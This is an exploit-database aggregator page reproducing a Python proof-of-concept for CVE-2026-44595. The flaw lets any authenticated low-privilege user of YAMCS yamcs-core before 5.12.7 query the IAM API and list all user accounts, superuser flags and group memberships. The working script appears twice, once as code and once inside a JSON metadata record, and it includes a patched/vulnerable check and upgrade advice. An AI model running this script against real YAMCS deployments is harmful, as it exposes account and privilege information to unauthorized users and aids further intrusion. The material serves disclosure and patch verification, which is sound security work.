YAMCS yamcs-core 5.12.7 – User Enumeration_EDB-ID:52604

Description

Exploit Title: YAMCS yamcs-core 1 else "http://localhost:8090" username = sys.argv2 if lensys.argv 2 else "testuser" password = sys.argv3 if lensys.argv 3 else "test" base = target...

Visit Original Source

Basic Information

ID EDB-ID:52604

Published May 30, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: YAMCS yamcs-core < 5.12.7 - User Enumeration
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44595
# Category: Remote / Information Disclosure
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29

#!/usr/bin/env python3
"""
CVE-2026-44595 — YAMCS Unauthorized User Enumeration via IAM API
=================================================================
IAM API endpoints (listUsers, getUser, listGroups, getGroup) do
not enforce SystemPrivilege.ControlAccess. Any authenticated user
can enumerate all accounts, superuser status, and group memberships.

Affected endpoints:
GET /api/iam/users
GET /api/iam/users/{name}
GET /api/iam/groups
GET /api/iam/groups/{name}
=================================================================
"""

import requests
import sys
import json

def main():
target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8090"
username = sys.argv[2] if len(sys.argv) > 2 else "testuser"
password = sys.argv[3] if len(sys.argv) > 3 else "test"
base = target.rstrip("/")

print("=" * 65)
print(" CVE-2026-44595 — YAMCS IAM User Enumeration PoC")
print(f" Target: {target}")
print(f" Username: {username} (low-privilege account)")
print("=" * 65)

# Authenticate
print(f"\n[1] Authenticating as low-privilege user...")
try:
resp = requests.post(f"{base}/auth/token",
data={"grant_type": "password",
"username": username,
"password": password})

if resp.status_code != 200:
print(f" [-] Auth failed: HTTP {resp.status_code}")
print(f" [*] Create test user: yamcsadmin users create testuser --password test")
return

token = resp.json().get("access_token")
print(f" [+] Token: {token[:30]}...")
headers = {"Authorization": f"Bearer {token}"}

except Exception as e:
print(f" [-] Error: {e}")
return

# Enumerate users
print(f"\n[2] GET /api/iam/users (requires ControlAccess — not enforced):")
resp = requests.get(f"{base}/api/iam/users", headers=headers)
print(f" HTTP: {resp.status_code}")

if resp.status_code == 200:
users = resp.json().get("users", [])
print(f"\n [!!!] VULNERABLE — {len(users)} users enumerated:")
for u in users:
flag = "SUPERUSER" if u.get("superuser") else "regular"
print(f" -> {u.get('name')} [{flag}]")
elif resp.status_code == 403:
print(f" [+] 403 Access Denied — PATCHED")

# Enumerate groups
print(f"\n[3] GET /api/iam/groups:")
resp = requests.get(f"{base}/api/iam/groups", headers=headers)
print(f" HTTP: {resp.status_code}")

if resp.status_code == 200:
groups = resp.json().get("groups", [])
print(f"\n [!!!] VULNERABLE — {len(groups)} groups enumerated:")
for g in groups:
print(f" -> {g.get('name')} ({len(g.get('members', []))} members)")
elif resp.status_code == 403:
print(f" [+] 403 Access Denied — PATCHED")

print("\n" + "=" * 65)
print(" Fix: Upgrade to yamcs-core >= 5.12.7")
print("=" * 65)

if __name__ == "__main__":
main()

{
    "lastseen": "2026-05-30T15:32:49",
    "description": "Exploit Title: YAMCS yamcs-core 1 else \"http://localhost:8090\" username = sys.argv2 if lensys.argv 2 else \"testuser\" password = sys.argv3 if lensys.argv 3 else \"test\" base = target...",
    "published": "2026-05-30T00:00:00",
    "modified": "2026-05-30T00:00:00",
    "type": "exploitdb",
    "title": "YAMCS yamcs-core  5.12.7 - User Enumeration",
    "source": "",
    "references": "",
    "id": "EDB-ID:52604",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-44595"
    ],
    "sourceData": "# Exploit Title: YAMCS yamcs-core < 5.12.7 -  User Enumeration \r\n# Date: 2026-05-27\r\n# Exploit Author: Daniel Miranda Barcelona (Excal1bur)\r\n# Vendor Homepage: https://yamcs.org\r\n# Software Link: https://github.com/yamcs/yamcs\r\n# Version: < 5.12.7\r\n# Tested on: Linux\r\n# CVE: CVE-2026-44595\r\n# Category: Remote / Information Disclosure\r\n# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-p2rj-mrmc-9w29\r\n\r\n#!/usr/bin/env python3\r\n\"\"\"\r\nCVE-2026-44595 \u2014 YAMCS Unauthorized User Enumeration via IAM API\r\n=================================================================\r\nIAM API endpoints (listUsers, getUser, listGroups, getGroup) do\r\nnot enforce SystemPrivilege.ControlAccess. Any authenticated user\r\ncan enumerate all accounts, superuser status, and group memberships.\r\n\r\nAffected endpoints:\r\n    GET /api/iam/users\r\n    GET /api/iam/users/{name}\r\n    GET /api/iam/groups\r\n    GET /api/iam/groups/{name}\r\n=================================================================\r\n\"\"\"\r\n\r\nimport requests\r\nimport sys\r\nimport json\r\n\r\ndef main():\r\n    target   = sys.argv[1] if len(sys.argv) > 1 else \"http://localhost:8090\"\r\n    username = sys.argv[2] if len(sys.argv) > 2 else \"testuser\"\r\n    password = sys.argv[3] if len(sys.argv) > 3 else \"test\"\r\n    base = target.rstrip(\"/\")\r\n\r\n    print(\"=\" * 65)\r\n    print(\" CVE-2026-44595 \u2014 YAMCS IAM User Enumeration PoC\")\r\n    print(f\" Target:   {target}\")\r\n    print(f\" Username: {username} (low-privilege account)\")\r\n    print(\"=\" * 65)\r\n\r\n    # Authenticate\r\n    print(f\"\\n[1] Authenticating as low-privilege user...\")\r\n    try:\r\n        resp = requests.post(f\"{base}/auth/token\",\r\n            data={\"grant_type\": \"password\",\r\n                  \"username\": username,\r\n                  \"password\": password})\r\n\r\n        if resp.status_code != 200:\r\n            print(f\"    [-] Auth failed: HTTP {resp.status_code}\")\r\n            print(f\"    [*] Create test user: yamcsadmin users create testuser --password test\")\r\n            return\r\n\r\n        token = resp.json().get(\"access_token\")\r\n        print(f\"    [+] Token: {token[:30]}...\")\r\n        headers = {\"Authorization\": f\"Bearer {token}\"}\r\n\r\n    except Exception as e:\r\n        print(f\"    [-] Error: {e}\")\r\n        return\r\n\r\n    # Enumerate users\r\n    print(f\"\\n[2] GET /api/iam/users (requires ControlAccess \u2014 not enforced):\")\r\n    resp = requests.get(f\"{base}/api/iam/users\", headers=headers)\r\n    print(f\"    HTTP: {resp.status_code}\")\r\n\r\n    if resp.status_code == 200:\r\n        users = resp.json().get(\"users\", [])\r\n        print(f\"\\n    [!!!] VULNERABLE \u2014 {len(users)} users enumerated:\")\r\n        for u in users:\r\n            flag = \"SUPERUSER\" if u.get(\"superuser\") else \"regular\"\r\n            print(f\"    -> {u.get('name')} [{flag}]\")\r\n    elif resp.status_code == 403:\r\n        print(f\"    [+] 403 Access Denied \u2014 PATCHED\")\r\n\r\n    # Enumerate groups\r\n    print(f\"\\n[3] GET /api/iam/groups:\")\r\n    resp = requests.get(f\"{base}/api/iam/groups\", headers=headers)\r\n    print(f\"    HTTP: {resp.status_code}\")\r\n\r\n    if resp.status_code == 200:\r\n        groups = resp.json().get(\"groups\", [])\r\n        print(f\"\\n    [!!!] VULNERABLE \u2014 {len(groups)} groups enumerated:\")\r\n        for g in groups:\r\n            print(f\"    -> {g.get('name')} ({len(g.get('members', []))} members)\")\r\n    elif resp.status_code == 403:\r\n        print(f\"    [+] 403 Access Denied \u2014 PATCHED\")\r\n\r\n    print(\"\\n\" + \"=\" * 65)\r\n    print(\" Fix: Upgrade to yamcs-core >= 5.12.7\")\r\n    print(\"=\" * 65)\r\n\r\nif __name__ == \"__main__\":\r\n    main()",
    "sourceHref": "https://www.exploit-db.com/raw/52604",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52604",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply